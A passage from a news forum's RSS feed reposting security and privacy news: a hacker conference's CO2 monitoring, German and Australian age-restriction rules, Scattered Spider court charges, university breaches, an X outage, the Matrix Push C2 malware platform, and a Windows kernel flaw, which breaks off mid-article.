<div class="GenericCalloutWrapper-IJXIe jtooe callout--has-top-border" data-event-boundary="click" data-event-click='{"pattern":"GenericCallout"}' data-in-view='{"pattern":"GenericCallout"}' data-include-experiments="true" data-testid="GenericCallout">
	<div class="AssetEmbedAssetContainer-eEeytc eRSvCP asset-embed__asset-container">
		<span class="SpanWrapper-zEXFr koTknX responsive-asset AssetEmbedResponsiveAsset-cIfZLr fHIkTW asset-embed__responsive-asset"><picture class="ResponsiveImagePicture-cGZhnX jwYQWO AssetEmbedResponsiveAsset-cIfZLr fHIkTW asset-embed__responsive-asset responsive-image"><img alt="VB%202025-11-06-123838_002.png" class="ipsImage" height="720" width="720" src="https://media.wired.com/photos/69161bda3e3d221364b27c66/master/w_960,c_limit/VB%202025-11-06-123838_002.png"></picture></span>
	</div>

	<div class="CaptionWrapper-jYrTxZ byeLF caption AssetEmbedCaption-fyuOdR eXMqGf asset-embed__caption standard" data-event-boundary="click" data-event-click='{"pattern":"Caption"}' data-in-view='{"pattern":"Caption"}' data-include-experiments="true" data-testid="caption-wrapper">
		<em><span class="BaseWrap-sc-gzmcOU BaseText-eqOrNE CaptionCredit-eowWKH deqABF kpqIso gxwcqg caption__credit">Courtesy of Violet Blue</span></em>
	</div>

</div>

<p>
	“That’s awesome,” says <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://www.adafruit.com/" href="https://www.adafruit.com/" rel="external nofollow" target="_blank">Adafruit</a> founder and engineer Limor “Ladyada” Fried about the conference’s adaptation of the Matrix Portal project. “The best part is seeing folks pick up new skills and really understand how we measure and monitor air quality in the real world (like at a con during a measles flare-up)! Hackers and makers are able to be self-reliant when it comes to their public-health information needs.” (For the full specs of the Kawaiicon build, you can check out the <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://github.com/oseiler2/co2monitor?tab=readme-ov-file#pcba-factory-assembled-version" href="https://github.com/oseiler2/co2monitor?tab=readme-ov-file#pcba-factory-assembled-version" rel="external nofollow" target="_blank">GitHub repository here</a>.)
</p>

<p>
	 
</p>

<p>
	The Michael Fowler Centre is a spectacular blend of Scandinavian brutalism and interior woodwork designed to enhance sound and air, including two grand pou—carved Māori totems—next to the main entrance that rise through to the upper foyers. Its cathedral-like acoustics posed a challenge to Kawaiicon’s air-hacking crew, which they solved by placing the RGB monitors in stereo. There were two on each level of the Main Auditorium (four total), two in the Renouf session space on level 1, plus monitors in the daycare and Kuracon (kids’ hacker conference) areas. To top it off, monitors were placed in the Quiet Room, at the Registration Desk, and in the Green Room.
</p>

<p>
	 
</p>

<p>
	“The things we had to consider were typical health and safety, and effective placement (breathing height, multiple monitors for multiple spaces, not near windows/doors),” a Kawaiicon spokesperson who goes by <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://kawaiicon.org/crue/" href="https://kawaiicon.org/crue/" rel="external nofollow" target="_blank">Sput</a> online told WIRED over email.
</p>

<p>
	 
</p>

<div class="GenericCalloutWrapper-IJXIe jtooe callout--has-top-border" data-event-boundary="click" data-event-click='{"pattern":"GenericCallout"}' data-in-view='{"pattern":"GenericCallout"}' data-include-experiments="true" data-testid="GenericCallout">
	<div class="AssetEmbedAssetContainer-eEeytc eRSvCP asset-embed__asset-container">
		<span class="SpanWrapper-zEXFr koTknX responsive-asset AssetEmbedResponsiveAsset-cIfZLr fHIkTW asset-embed__responsive-asset"><picture class="ResponsiveImagePicture-cGZhnX jwYQWO AssetEmbedResponsiveAsset-cIfZLr fHIkTW asset-embed__responsive-asset responsive-image"><img alt="VB%202025-11-02%20at%204.18.04%20PM.png" class="ipsImage" height="720" width="720" src="https://media.wired.com/photos/69161bdaaf2f18501508f426/master/w_960,c_limit/VB%202025-11-02%20at%204.18.04%20PM.png"></picture></span>
	</div>

	<div class="CaptionWrapper-jYrTxZ byeLF caption AssetEmbedCaption-fyuOdR eXMqGf asset-embed__caption standard" data-event-boundary="click" data-event-click='{"pattern":"Caption"}' data-in-view='{"pattern":"Caption"}' data-include-experiments="true" data-testid="caption-wrapper">
		<em><span class="BaseWrap-sc-gzmcOU BaseText-eqOrNE CaptionCredit-eowWKH deqABF kpqIso gxwcqg caption__credit">Courtesy of Violet Blue</span></em>
	</div>

</div>

<p>
	“To be honest, it is no different than having to consider other accessibility options (e.g., access to venue, access to talks, access to private space for personal needs),” Sput wrote. “Being a tech-leaning community it is easier for us to get this set up ourselves, or with volunteer help, but definitely not out of reach given how accessible the CO<sub>2</sub> monitor tech is.”
</p>

<p>
	 
</p>

<p>
	Kawaiicon’s attendees could quickly check the conditions before they arrived and decide how to protect themselves accordingly. At the event, WIRED observed attendees checking CO<sub>2</sub> levels on their phones, masking and unmasking in different conference areas, and watching a display of all room readings on a dashboard at the registration desk.
</p>

<p>
	 
</p>

<div class="AssetEmbedAssetContainer-eEeytc eRSvCP asset-embed__asset-container">
	<span class="SpanWrapper-zEXFr koTknX responsive-asset AssetEmbedResponsiveAsset-cIfZLr fHIkTW asset-embed__responsive-asset"><picture class="ResponsiveImagePicture-cGZhnX jwYQWO AssetEmbedResponsiveAsset-cIfZLr fHIkTW asset-embed__responsive-asset responsive-image"><img alt="VB%202025-11-06-134251_002.jpeg" class="ipsImage" height="720" width="720" src="https://media.wired.com/photos/69161bdac13a0a9b72a9ae48/master/w_960,c_limit/VB%202025-11-06-134251_002.jpeg"></picture></span>
</div>

<div class="CaptionWrapper-jYrTxZ byeLF caption AssetEmbedCaption-fyuOdR eXMqGf asset-embed__caption standard" data-event-boundary="click" data-event-click='{"pattern":"Caption"}' data-in-view='{"pattern":"Caption"}' data-include-experiments="true" data-testid="caption-wrapper">
	<em><span class="BaseWrap-sc-gzmcOU BaseText-eqOrNE CaptionCredit-eowWKH deqABF kpqIso gxwcqg caption__credit">Courtesy of Violet Blue</span></em>
</div>

<p>
	In each conference session room, small wall-mounted monitors displayed stoplight colors showing immediate conditions: green for safe, orange for risky, and red for high CO<sub>2</sub> levels, the top risk level.
</p>

<p>
	 
</p>

<div class="AssetEmbedAssetContainer-eEeytc eRSvCP asset-embed__asset-container">
	<span class="SpanWrapper-zEXFr koTknX responsive-asset AssetEmbedResponsiveAsset-cIfZLr fHIkTW asset-embed__responsive-asset"><picture class="ResponsiveImagePicture-cGZhnX jwYQWO AssetEmbedResponsiveAsset-cIfZLr fHIkTW asset-embed__responsive-asset responsive-image"><img alt="OS%20RGB%20CO2%20mons.png" class="ipsImage" height="720" width="720" src="https://media.wired.com/photos/69161c512fc4c3ff4a039105/master/w_960,c_limit/OS%20RGB%20CO2%20mons.png"></picture></span>
</div>

<div class="CaptionWrapper-jYrTxZ byeLF caption AssetEmbedCaption-fyuOdR eXMqGf asset-embed__caption standard" data-event-boundary="click" data-event-click='{"pattern":"Caption"}' data-in-view='{"pattern":"Caption"}' data-include-experiments="true" data-testid="caption-wrapper">
	<em><span class="BaseWrap-sc-gzmcOU BaseText-eqOrNE CaptionCredit-eowWKH deqABF kpqIso gxwcqg caption__credit">Courtesy of Oliver Seiler</span></em>
</div>

<p>
	“Everyone who occupies the con space we operate has a different risk and threat model, and we want everyone to feel they can experience the con in a way that fits their model,” the organizers wrote on their website. “Considering Covid-19 is still in the community, we wanted to make sure that everyone had all the information they needed to make their own risk assessment on ‘if’ and ‘how’ they attended the con. So this is our threat model and all the controls and zones we have in place.”
</p>

<p>
	 
</p>

<p>
	Colorful custom-made Kawaiicon posters by New Zealand artist <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://pepperraccoon.com/en-us" href="https://pepperraccoon.com/en-us" rel="external nofollow" target="_blank">Pepper Raccoon</a> placed throughout the Michael Fowler Centre displayed a QR code, making the CO<sub>2</sub> dashboard a tap away, no matter where they were at the conference.
</p>

<p>
	 
</p>

<p>
	“We think this is important so folks don't put themselves at risk having to go directly up to a monitor to see a reading,” Kawaiicon spokesperson Sput told WIRED. “It also helps folks find a space that they can move to if the reading in their space gets too high.”
</p>

<p>
	 
</p>

<div class="AssetEmbedAssetContainer-eEeytc eRSvCP asset-embed__asset-container">
	<span class="SpanWrapper-zEXFr koTknX responsive-asset AssetEmbedResponsiveAsset-cIfZLr fHIkTW asset-embed__responsive-asset"><picture class="ResponsiveImagePicture-cGZhnX jwYQWO AssetEmbedResponsiveAsset-cIfZLr fHIkTW asset-embed__responsive-asset responsive-image"><img alt="OS%202025-11-08-194510_002.png" class="ipsImage" height="720" width="720" src="https://media.wired.com/photos/69161c51ffebabc7cea9f6d5/master/w_960,c_limit/OS%202025-11-08-194510_002.png"></picture></span>
</div>

<div class="CaptionWrapper-jYrTxZ byeLF caption AssetEmbedCaption-fyuOdR eXMqGf asset-embed__caption standard" data-event-boundary="click" data-event-click='{"pattern":"Caption"}' data-in-view='{"pattern":"Caption"}' data-include-experiments="true" data-testid="caption-wrapper">
	<em><span class="BaseWrap-sc-gzmcOU BaseText-eqOrNE CaptionCredit-eowWKH deqABF kpqIso gxwcqg caption__credit">Courtesy of Oliver Seiler</span></em>
</div>

<p>
	It's a DIY solution any conference can put in place: <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://github.com/oseiler2/co2monitor?tab=readme-ov-file#why-use-a-co2-monitor" href="https://github.com/oseiler2/co2monitor?tab=readme-ov-file#why-use-a-co2-monitor" rel="external nofollow" target="_blank">resources, parts lists, and assembly guides are here</a>.
</p>

<p>
	 
</p>

<p>
	Kawaiicon's organizers aren't keen to pretend there were no risks to gathering in groups during ongoing outbreaks. “Masks are encouraged, but not required,” Kawaiicon's Health and Safety page <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://kawaiicon.org/health-and-safety/" href="https://kawaiicon.org/health-and-safety/" rel="external nofollow" target="_blank">stated</a>. “Free masks will be available at the con if you need one.” They encouraged attendees to test before coming in, and for complete accessibility for all hackers who wanted to attend, of any ability, they offered a <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://kawaiicon.org/livestream/" href="https://kawaiicon.org/livestream/" rel="external nofollow" target="_blank">full virtual con stream</a> with no ticket required.
</p>

<p>
	 
</p>

<p>
	Trying to find out if a venue will have clean or gross recycled air before attending a hacker conference has been a pain point for researchers who can't afford to get sick at, or after, the next B-Sides, Defcon, or Black Hat. Kawaiicon addresses this headache. But they’re not here for debates about beliefs or anti-science trolling. “We each have our different risk tolerance,” the organizers wrote. “Just leave others to make the call that is best for them. No one needs your snarky commentary.”
</p>

<p>
	 
</p>

<p>
	<a href="https://www.wired.com/story/this-hacker-conference-installed-a-literal-anti-virus-monitoring-system/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Posted Saturday 22 November 2025 at 4:20 am AEST (my time).</em></span>
</p>

]]></description><guid isPermaLink="false">32581</guid><pubDate>Fri, 21 Nov 2025 18:21:39 +0000</pubDate></item><item><title>Germany gets closer to mandating age assurance at OS level</title><link>https://nsaneforums.com/news/security-privacy-news/germany-gets-closer-to-mandating-age-assurance-at-os-level-r32580/</link><description><![CDATA[<p>
	State parliaments in Germany have passed the latest reform of the Interstate Treaty on the Protection of Minors in the Media (JMStV). The reform aims to protect young people on the internet from age-inappropriate content such as pornography, violence, hate speech, incitement, and misinformation by enforcing mechanisms at the operating system level.
</p>

<p>
	 
</p>

<p>
	Operating system makers such as Microsoft, Apple, and Google will have to ensure their systems come with a "youth protection device" that allows parents to switch to a child or youth mode using a one-button solution. It's not just set to apply to computers either; it is intended that providers build these switches into PCs, laptops, smart TVs, game consoles, and smartphones.
</p>

<p>
	 
</p>

<p>
	Not only will operating system vendors be affected, but app developers will see changes too. <a automate_uuid="722c8b35-1dfa-4163-8e15-8f910950e7d2" href="https://www.heise.de/en/news/Youth-Protection-States-Pass-Porn-Filters-for-Operating-Systems-11086768.html" rel="external nofollow">According to Heise</a>, web browsers such as Chrome and Firefox will only be accessible in the child mode if they have a secure search function or if unsecured access is individually and securely enabled. The lawmakers also envision that parents will be able to block children from accessing individual browsers and programs.
</p>

<p>
	 
</p>

<p>
	Right now, there is no common system in place on a technical level for operating systems to perform age assurance, nor is there a secure search function at the web browser level. All of this would need to be standardized and implemented across numerous projects, which would normally take time. However, lawmakers have said that the new operating system approach will come into force by December 1, 2027.
</p>

<p>
	 
</p>

<p>
	A bit of leeway is being given for devices currently in production; they will have three years to adjust rather than two. Devices on the market already that have an operating system that is no longer being updated will also be excluded from these measures.
</p>

<p>
	 
</p>

<p>
	The measures being pursued have been <a automate_uuid="a753638f-1ba6-4bdf-aa86-68b99d05bf5a" href="https://www.neowin.net/news/google-doesnt-want-to-be-held-responsible-for-os-level-age-assurance/" rel="external nofollow">criticized by manufacturers of operating systems</a>, tech associations, and the Free Software Foundation Europe (FSFE), which advocates for consumers to have complete freedom to use devices in any way they wish.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/germany-gets-closer-to-mandating-age-assurance-at-os-level/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Posted Saturday 22 November 2025 at 4:19 am AEST (my time).</em></span>
</p>

]]></description><guid isPermaLink="false">32580</guid><pubDate>Fri, 21 Nov 2025 18:20:13 +0000</pubDate></item><item><title>Australia adds Twitch to its teen social media ban</title><link>https://nsaneforums.com/news/security-privacy-news/australia-adds-twitch-to-its-teen-social-media-ban-r32579/</link><description><![CDATA[<p>
	<a automate_uuid="d67bda38-77be-49ae-8772-6dddd8bbb91d" href="https://www.neowin.net/news/google-casts-doubt-on-australias-social-media-ban-for-under-16s/" rel="external nofollow">Australia's teen social media ban</a> has been extended to include the streaming platform Twitch, where gamers go to watch others live-stream gameplay. The teen account ban is due to come into force on December 10 and requires tech companies to take reasonable steps to stop under-16s from opening accounts, while existing accounts must be closed.
</p>

<p>
	 
</p>

<p>
	The goal behind the ban is to reduce the pressures and risks, including harmful content, that children could be exposed to on social media. The ban will prevent kids accessing Twitch, Facebook, Instagram, TikTok, Snapchat, YouTube, Reddit, Kick, Threads, and X. Interestingly, it doesn't include a certain new technology that people are increasingly using: artificial intelligence.
</p>

<p>
	 
</p>

<p>
	Twitch is a popular platform with gamers. It is owned by the e-commerce giant Amazon and was included because its main purpose is online social interaction. If you are under 16, you will be prevented from making an account there from December 10, while existing accounts will be deactivated from January 9.
</p>

<p>
	 
</p>

<p>
	Once the rule comes into effect, companies are expected to use measures like government IDs, face or voice recognition, or age inference (estimating age through online behavior) to grant access to those old enough to use the platforms. If a company fails to implement these rules, they face fines of up to $49.5 million Australian dollars (US$32 million).
</p>

<p>
	 
</p>

<p>
	Meta, which owns Facebook, Instagram, and Threads, has said that it will begin closing accounts of teenagers under 16 from December 4, ahead of the official ban, so that it doesn't leave things too late and get fined. Interestingly, there is one popular social media platform that is not affected by the ban right now, and that is Pinterest. It was decided that Pinterest is more about collating images for inspiration and idea curation rather than online social interaction.
</p>

<p>
	 
</p>

<p>
	The social media ban is an attempt to reduce online harms and negative impact on children's mental health. The government hopes that the measures help to cut out cyberbullying too. It will be interesting to see what impact this has on the lives of kids in the country. Will they start playing outside more like kids growing up in the 1990s and 2000s or will they turn to artificial intelligence and have an <a automate_uuid="89ddeed7-00cf-4806-8b04-faa3ac72178f" href="https://www.neowin.net/news/new-study-finds-ai-chatbots-unreliable-in-responding-to-suicide-related-queries/" rel="external nofollow">unhealthy relationship with a large language model</a>? Only time will tell.
</p>

<p>
	 
</p>

<p>
	Source: <a automate_uuid="fac4c33d-c743-4ed9-833f-9160dd2a54a7" href="https://www.bbc.com/news/articles/cx2n2955g10o" rel="external nofollow">BBC News</a>
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/australia-adds-twitch-to-its-teen-social-media-ban/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post. Feedback welcome.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Saturday 22 November 2025 at 4:18 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of October): 5,009</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
</p>
]]></description><guid isPermaLink="false">32579</guid><pubDate>Fri, 21 Nov 2025 18:18:41 +0000</pubDate></item><item><title>'Scattered Spider' teens plead not guilty to UK transport hack</title><link>https://nsaneforums.com/news/security-privacy-news/scattered-spider-teens-plead-not-guilty-to-uk-transport-hack-r32578/</link><description><![CDATA[<p>
	Two British teenagers have denied charges related to an investigation into the breach of Transport for London (TfL) in August 2024, which caused millions of pounds in damage and exposed customer data.
</p>

<p>
	 
</p>

<p>
	Believed to be members of the <a href="https://www.bleepingcomputer.com/tag/Scattered-Spider/" rel="external nofollow" target="_blank">Scattered Spider hacking collective</a>, 19-year-old Thalha Jubair from east London and 18-year-old Owen Flowers from Walsall were <a href="https://www.bleepingcomputer.com/news/security/uk-arrests-scattered-spider-teens-linked-to-transport-for-london-hack/" rel="external nofollow" target="_blank">arrested</a> at their homes in September 2024 by officers from the UK National Crime Agency (NCA) and the City of London Police.
</p>

<p>
	 
</p>

<p>
	Flowers was also <a href="https://www.bleepingcomputer.com/news/security/uk-arrests-teen-linked-to-transport-for-london-cyber-attack/" rel="external nofollow" target="_blank">arrested</a> for his alleged involvement in the TfL attack in September 2024, but was released on bail after being questioned by NCA officers.
</p>

<p>
	 
</p>

<p>
	According to a <a href="https://news.sky.com/story/teenagers-plead-not-guilty-to-london-transport-cyber-attack-13473518" rel="external nofollow" target="_blank">Sky News report</a>, Jubair and Flowers have now pleaded not guilty to computer misuse and fraud-related charges at Southwark Crown Court. The charges allege the defendants caused "or creating a significant risk of, serious damage to human welfare and intending to cause such damage or being reckless as to whether such damage was caused."
</p>

<p>
	 
</p>

<p>
	TfL disclosed the August 2024 breach <a href="https://www.bleepingcomputer.com/news/security/transport-for-london-discloses-ongoing-cyber-security-incident/" rel="external nofollow" target="_blank">on September 2, 2024,</a> stating that it had found no evidence that customer data was compromised. While this attack did not affect London's transportation services, it <a href="https://www.bleepingcomputer.com/news/security/transport-for-london-staff-faces-systems-disruptions-after-cyberattack/" rel="external nofollow" target="_blank">disrupted</a> online services and internal systems, as well as the public transportation agency's ability to process refunds.
</p>

<p>
	 
</p>

<p>
	In a subsequent update, TfL <a href="https://www.bleepingcomputer.com/news/security/transport-for-london-confirms-customer-data-stolen-in-cyberattack/" rel="external nofollow" target="_blank">revealed</a> that customer data, including names, addresses, and contact details, was actually compromised during the incident. TfL provides transportation services to more than 8.4 million Londoners through its surface, underground, and Crossrail systems, which are jointly managed with the UK's Department for Transport.
</p>

<p>
	 
</p>

<p>
	Flowers is also facing charges involving conspiring to attack the networks of SSM Health Care Corporation and Sutter Health in the United States, while Jubair is separately charged with failing to disclose passwords seized from him in March 2025.
</p>

<p>
	 
</p>

<p>
	"This attack caused significant disruption and millions in losses to TfL, part of the UK's critical national infrastructure," said Paul Foster, the head of the NCA's National Cyber Crime Unit, in September. "Earlier this year, the NCA warned of an increase in the threat from cyber criminals based in the UK and other English-speaking countries, of which Scattered Spider is a clear example."
</p>

<p>
	 
</p>

<p>
	In September, the U.S. Department of Justice also <a href="https://www.justice.gov/opa/pr/united-kingdom-national-charged-connection-multiple-cyber-attacks-including-critical" rel="external nofollow" target="_blank">charged Jubair</a> with conspiracy to commit computer fraud, money laundering, and wire fraud. These charges relate to at least 120 incidents of network breaches between May 2022 and September 2025, affecting at least 47 U.S. organizations and including extortion attempts worldwide and attacks on critical infrastructure entities and U.S. courts.
</p>

<p>
	 
</p>

<p>
	According to <a href="https://legacy.www.documentcloud.org/documents/26103409-thalhajubaircomplaint/" rel="external nofollow" target="_blank">court documents</a>, victims have paid Jubair and his accomplices over $115 million in ransom payments.
</p>

<p>
	 
</p>

<p>
	In July, the NCA <a href="https://www.bleepingcomputer.com/news/security/four-arrested-in-uk-over-mands-co-op-harrods-cyberattacks/" rel="external nofollow" target="_blank">arrested</a> four other suspected members of the Scattered Spider cybercrime collective, believed to be linked to cyberattacks against major retailers in the country, including <a href="https://www.bleepingcomputer.com/tag/marks-and-spencer/" rel="external nofollow" target="_blank">Marks &amp; Spencer</a>, <a href="https://www.bleepingcomputer.com/tag/harrods/" rel="external nofollow" target="_blank">Harrods</a>, and <a href="https://www.bleepingcomputer.com/tag/co-op/" rel="external nofollow" target="_blank">Co-op</a>.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/scattered-spider-teens-plead-not-guilty-to-uk-transport-hack/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">

<p>
	<span style="font-size:12px;"><em>Posted Saturday 22 November 2025 at 4:17 am AEST (my time).</em></span>
</p>

]]></description><guid isPermaLink="false">32578</guid><pubDate>Fri, 21 Nov 2025 18:17:49 +0000</pubDate></item><item><title>Cyberattacks' harm to universities is growing &#x2014; and so are their effects on research</title><link>https://nsaneforums.com/news/security-privacy-news/cyberattacks-harm-to-universities-is-growing-%E2%80%94-and-so-are-their-effects-on-research-r32573/</link><description><![CDATA[<p>
	<span style="font-size:16px;"><strong>Hackers are ramping up attacks on academic institutions to access valuable data and to demand ransoms. </strong></span>
</p>

<p>
	 
</p>

<p>
	On 10 November, hackers gained access to a Princeton University database containing the personal information of those in the institution’s community, including alumni, donors and students. In October, similar data breaches occurred at the University of Pennsylvania in Philadelphia and Harvard University in Cambridge, Massachusetts.
</p>

<p>
	 
</p>

<p>
	These incidents are part of a broader trend. Over the past few years, cyberattacks have been on the rise at academic institutions around the globe. Not only are attacks time-consuming and costly to contain and clean up, but they have also caused university employees to lose access to essential digital services, such as e-mail and research software, for weeks — or even months — at a time.
</p>

<p>
	 
</p>

<p>
	“The number of cyberattacks is not relenting,” says Harjinder Singh Lallie, a cybersecurity specialist at the University of Warwick, UK.
</p>

<p>
	 
</p>

<p>
	Universities have been working to implement more robust security systems, but specialists say that academic institutions need to do more to shore up defences, especially against attacks that are assisted by artificial intelligence (AI), which might enable hackers to conduct breaches with greater speed and ease.
</p>

<p>
	 
</p>

<p>
	Toby Murray, a cybersecurity researcher at the University of Melbourne in Australia, says that in today’s political climate, in which competition between countries has been on the rise, “universities remain a really attractive target”. It’s often difficult to trace where attacks come from, but some have been traced to state-sponsored groups, and often involve the use of ransomware, malicious software that blocks data or systems until a payment is made.
</p>

<p>
	 
</p>

<p>
	<span style="font-size:22px;"><strong>What makes universities vulnerable?</strong></span>
</p>

<p>
	 
</p>

<p>
	Across all sectors, from government organizations to private companies, cyberattacks have been increasing. Specialists say that universities are particularly vulnerable because of the valuable data they house, such as employee records and intellectual property, and because these institutions are difficult to secure. Many universities have older, outdated security systems as well as diverse digital infrastructures and communities that can make it easy for hackers to infiltrate such systems.
</p>

<p>
	 
</p>

<p>
	“It’s going to get worse,” says David Batho, the director of security at Jisc, an organization that provides digital infrastructure to educational institutions in the United Kingdom. “Prevention is no longer enough. Building resilience is essential.”
</p>

<p>
	 
</p>

<p>
	A UK government survey carried out between August and December last year revealed that the country’s educational institutions have had a high prevalence of cybersecurity breaches and were more likely to experience such incidents than were other businesses. According to an accompanying report, 91% of higher education institutions and 85% of further education colleges reported having experienced such an incident in the past 12 months.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.nature.com/articles/d41586-025-03484-9" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">32573</guid><pubDate>Fri, 21 Nov 2025 17:51:42 +0000</pubDate></item><item><title>Elon Musk's X down for thousands of US users, Downdetector shows</title><link>https://nsaneforums.com/news/security-privacy-news/elon-musks-x-down-for-thousands-of-us-users-downdetector-shows-r32572/</link><description><![CDATA[<p>
	Nov 21 (Reuters) - Elon Musk's X was down for thousands of users in the United States on Friday, according to Downdetector.com.
</p>

<p>
	<br />
	There were more than 19,500 reports of issues with the social media platform, as of 10:51 a.m. ET, according to Downdetector, which tracks outages by collating status reports from a number of sources.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.reuters.com/business/elon-musks-x-down-thousands-us-users-downdetector-shows-2025-11-21/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">32572</guid><pubDate>Fri, 21 Nov 2025 17:36:24 +0000</pubDate></item><item><title>Cybercriminals Exploit Browser Push Notifications to Deliver Malware</title><link>https://nsaneforums.com/news/security-privacy-news/cybercriminals-exploit-browser-push-notifications-to-deliver-malware-r32569/</link><description><![CDATA[<p>
	Cybercriminals are delivering malware via web browser features using a newly discovered command-and-control (C2) platform dubbed Matrix Push C2.
</p>

<p>
	 
</p>

<p>
	The malicious C2 platform, discovered by BlackFrog, tricks users with fake system notifications, redirecting them to malicious sites, monitoring infected clients in real time, and even scanning for cryptocurrency wallets.
</p>

<p>
	 
</p>

<p>
	In a report published on November 20, BlackFrog outlined how Matrix Push C2 abuses the legitimate web browser push notification system as a C2 channel.
</p>

<p>
	 
</p>

<p>
	Matrix Push C2 works by first tricking users into allowing browser notifications, often via social engineering on malicious or compromised websites. Once a user is subscribed to the attacker’s notifications a direct line to that user’s desktop or mobile device is created via the browser.
</p>

<p>
	 
</p>

<p>
	The cybercriminals then push out legitimate-looking error messages and security alerts that appear as if they are from the operating system or trusted software.
</p>

<p>
	 
</p>

<p>
	However, if a victim clicks on these fake notifications, they are taken to a site run by the attacker, often a phishing page or a malware download.
</p>

<p>
	 
</p>

<p>
	BlackFrog described this attack as ‘fileless’ because the interaction happens through the browser’s notification system, so no traditional malware file needs to be present on the system initially.
</p>

<p>
	<br />
	<span style="font-size:22px;"><strong>Matrix Push C2 Platform Details</strong></span>
</p>

<p>
	 
</p>

<p>
	The attack is orchestrated via a web-based dashboard provided by the Matrix Push C2 platform. 
</p>

<p>
	 
</p>

<p>
	The threat is not limited to a single operating system (Windows, Mac, Linux, Android, etc.) because it operates through standard browser technology, noted BlackFrog.
</p>

<p>
	 
</p>

<p>
	The campaign dashboard, which is part of Matrix Push C2, shows an active client panel. This gives the attacker detailed information on each victim in real time.
</p>

<p>
	 
</p>

<p>
	“This real-time intelligence is part of what makes Matrix Push C2 so dangerous. The attacker isn’t firing blind phishing emails hoping someone clicks, they have a live connection to the victim’s browser,” said BlackFrog.
</p>

<p>
	 
</p>

<p>
	Matrix Push C2 also includes analytics and link management tools so the attacker can measure how effective their campaign is and adjust tactics.
</p>

<p>
	 
</p>

<p>
	For the social engineering element of the attack, Matrix Push C2 comes with configurable templates to maximize the credibility of its fake messages.
</p>

<p>
	 
</p>

<p>
	“In the settings, we found templates for brands such as MetaMask, Netflix, Cloudflare, PayPal, TikTok and more, each designed to look like a legitimate notification or security page from those providers,” the BlackFrog report noted.
</p>

<p>
	 
</p>

<p>
	Further, the attacker can generate short, innocuous URLs (under a path they control) that redirect to the real malicious site. This helps evade filters and lowers victims’ skepticism that comes with sending long, suspicious-looking links.
</p>

<p>
	 
</p>

<p>
	To counter this threat, BlackFrog recommended using anti data exfiltration (ADX) technology, focused on blocking outbound traffic.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.infosecurity-magazine.com/news/browser-push-notifications-deliver/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">32569</guid><pubDate>Fri, 21 Nov 2025 17:14:36 +0000</pubDate></item><item><title>Windows 11 has a massive kernel vulnerability</title><link>https://nsaneforums.com/news/security-privacy-news/windows-11-has-a-massive-kernel-vulnerability-r32561/</link><description><![CDATA[<p>
	<br />
	<strong>Summary</strong>
</p>

<p>
	 
</p>

<ul>
	<li>
		High-severity Windows kernel race condition can let low-privilege local users gain full admin rights.
	</li>
	<li>
		Exploit requires local access (compromised account or malware); not remotely exploitable.
	</li>
	<li>
		Microsoft released patches — update Windows immediately to block privilege escalation.
	</li>
</ul>

<p>
	 
</p>

<p>
	It's always bad when a new security issue pops up, and it's even worse when it affects multiple builds across multiple versions of an operating system. A lot of Windows users are being affected by a brand new security flaw, and this one looks pretty bad.
</p>

<p>
	 
</p>

<p>
	The Indian Computer Emergency Response Team (CERT-In), the national nodal agency in India for responding to computer security incidents, has released a detailed advisory regarding a flaw that affects a broad spectrum of Windows versions, including the most recent builds of Windows 11 and Windows Server. The agency has classified the issue as "high severity," and from what we can see, it's pretty bad.
</p>

<p>
	 
</p>

<p>
	According to the technical details provided by CERT-In, the flaw is at a kernel level and it's caused by a "race condition." In case you don't know what that is, a race condition occurs when a system attempts to perform two or more operations at the same time, but because of the nature of the device or software, the operations must be done in the proper sequence to be done correctly. When a system fails to manage these simultaneous requests to share resources, it creates a temporary gap in security logic. The Windows kernel seemingly fails to properly synchronize processes. And if an attacker can manipulate this confusion, they can bypass security protocols that usually segregate standard user activities from critical system functions.
</p>

<p>
	 
</p>

<p>
	To exploit this, a threat actor requires low-level access to the target system, so this isn't something that can be exploited remotely. This could be achieved through a compromised guest account, a standard employee login, or even malware that has already infected the machine with low-level permissions. But once the attacker triggers the race condition in the kernel, they can elevate their privileges from a restricted user to a full administrator. From there, they can do stuff such as manipulate or delete critical data, install persistent malware, ransomware, or keyloggers, or create new administrator accounts to maintain access.
</p>

<p>
	 
